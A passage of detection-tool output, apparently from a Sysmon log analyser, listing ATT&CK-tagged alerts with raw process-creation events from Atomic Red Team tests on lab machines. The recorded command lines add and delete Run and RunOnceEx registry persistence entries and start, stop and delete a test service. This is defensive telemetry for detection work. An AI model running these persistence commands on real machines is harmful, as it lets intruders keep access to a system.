</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547506.213488,2019-07-19T18:45:06.213488+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:45:06.196458Z"">
</TimeCreated>
<EventRecordID>3603</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:45:06.180</Data>
<Data Name=""ProcessGuid"">747F3D96-D772-5D31-0000-001031EB2800</Data>
<Data Name=""ProcessId"">6472</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547506.137175,2019-07-19T18:45:06.137175+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d &quot; C:\Path\AtomicRedTeam.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:45:06.075725Z"">
</TimeCreated>
<EventRecordID>3600</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:45:06.056</Data>
<Data Name=""ProcessGuid"">747F3D96-D772-5D31-0000-0010BEE52800</Data>
<Data Name=""ProcessId"">3216</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d &quot; C:\Path\AtomicRedTeam.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547506.075725,2019-07-19T18:45:06.075725+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:53.402498Z"">
</TimeCreated>
<EventRecordID>3599</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:44:53.388</Data>
<Data Name=""ProcessGuid"">747F3D96-D765-5D31-0000-001024C32800</Data>
<Data Name=""ProcessId"">4264</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547493.349171,2019-07-19T18:44:53.349171+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG DELETE &quot; &quot;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic&quot; Red &quot;Team /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:53.330492Z"">
</TimeCreated>
<EventRecordID>3596</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:44:53.314</Data>
<Data Name=""ProcessGuid"">747F3D96-D765-5D31-0000-0010D7BD2800</Data>
<Data Name=""ProcessId"">5824</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG DELETE &quot; &quot;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic&quot; Red &quot;Team /f&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553037534.182862,2019-03-20T03:18:54.182862+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T23:18:54.172848Z"">
</TimeCreated>
<EventRecordID>1966634</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""988"" ThreadID=""1644"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 23:13:38.586</Data>
<Data Name=""ProcessGuid"">365ABB72-77A2-5C91-0000-00100A570100</Data>
<Data Name=""ProcessId"">1636</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-777F-5C91-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-777F-5C91-0000-00100B590000</Data>
<Data Name=""ParentProcessId"">516</Data>
<Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553037534.172848,2019-03-20T03:18:54.172848+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T23:18:54.172848Z"">
</TimeCreated>
<EventRecordID>1966633</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""988"" ThreadID=""1644"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 23:13:38.576</Data>
<Data Name=""ProcessGuid"">365ABB72-77A2-5C91-0000-00106D560100</Data>
<Data Name=""ProcessId"">1628</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-777F-5C91-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-777F-5C91-0000-00100B590000</Data>
<Data Name=""ParentProcessId"">516</Data>
<Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547493.258049,2019-07-19T18:44:53.258049+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG ADD &quot; &quot;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic&quot; Red &quot;Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:53.219598Z"">
</TimeCreated>
<EventRecordID>3593</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:44:53.201</Data>
<Data Name=""ProcessGuid"">747F3D96-D765-5D31-0000-001027B72800</Data>
<Data Name=""ProcessId"">6584</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG ADD &quot; &quot;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic&quot; Red &quot;Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547466.222431,2019-07-19T18:44:26.222431+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:09.351888Z"">
</TimeCreated>
<EventRecordID>3588</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:44:09.337</Data>
<Data Name=""ProcessGuid"">747F3D96-D739-5D31-0000-0010B2C22600</Data>
<Data Name=""ProcessId"">6896</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547449.278042,2019-07-19T18:44:09.278042+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe delete AtomicTestService&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:09.253714Z"">
</TimeCreated>
<EventRecordID>3585</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:44:09.225</Data>
<Data Name=""ProcessGuid"">747F3D96-D739-5D31-0000-0010E4BB2600</Data>
<Data Name=""ProcessId"">4744</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe delete AtomicTestService&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547449.17604,2019-07-19T18:44:09.176040+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe stop AtomicTestService&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:09.150760Z"">
</TimeCreated>
<EventRecordID>3583</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:44:09.142</Data>
<Data Name=""ProcessGuid"">747F3D96-D739-5D31-0000-00104CB72600</Data>
<Data Name=""ProcessId"">5000</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe stop AtomicTestService&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1543 ] Sc.exe manipulating windows services,1563547448.307214,2019-07-19T18:44:08.307214+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to manipulate windows services using Sc.exe with Command Line (sc.exe start AtomicTestService) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe start AtomicTestService&quot;) in directory : ( C:\AtomicRedTeam\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:08.288861Z"">
</TimeCreated>
<EventRecordID>3581</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Persistence or Exec - Services Management</Data>
<Data Name=""UtcTime"">2019-07-19 14:44:08.269</Data>
<Data Name=""ProcessGuid"">747F3D96-D738-5D31-0000-0010D8AA2600</Data>
<Data Name=""ProcessId"">4260</Data>
<Data Name=""Image"">C:\Windows\System32\sc.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Service Control Manager Configuration Tool</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">sc.exe start AtomicTestService</Data>
